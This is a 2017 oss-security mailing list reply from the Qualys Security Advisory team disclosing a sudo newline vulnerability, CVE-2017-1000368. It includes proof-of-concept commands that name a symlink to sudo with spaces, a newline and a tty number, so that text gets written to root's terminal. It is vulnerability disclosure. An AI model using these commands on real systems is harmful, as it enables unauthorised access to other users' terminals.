Date: Tue, 6 Jun 2017 15:31:00 -0700 From: Qualys Security Advisory <qsa@...lys.com> To: oss-security@...ts.openwall.com Subject: Re: Arbitrary terminal access via sudo on Linux On Fri, Jun 02, 2017 at 12:55:10PM -0600, Todd C. Miller wrote: > However, the arbitrary tty access IS exploitable in 1.8.20p1. For example, against Sudo < 1.8.20p1: $ /usr/bin/sudo -l ... User john may run the following commands on localhost: (nobody) /usr/bin/sum $ ln -s /usr/bin/sudo ' 1026 ' (1026 is tty2, currently used by root) $ ./' 1026 ' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n' (this is written to root's tty2) Or, against Sudo = 1.8.20p1: $ ln -s /usr/bin/sudo $') 1026 \n' $ ./$') 1026 \n' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n' CVE-2017-1000368 was assigned to this newline vulnerability: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000368 With best regards, -- the Qualys Security Advisory team
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ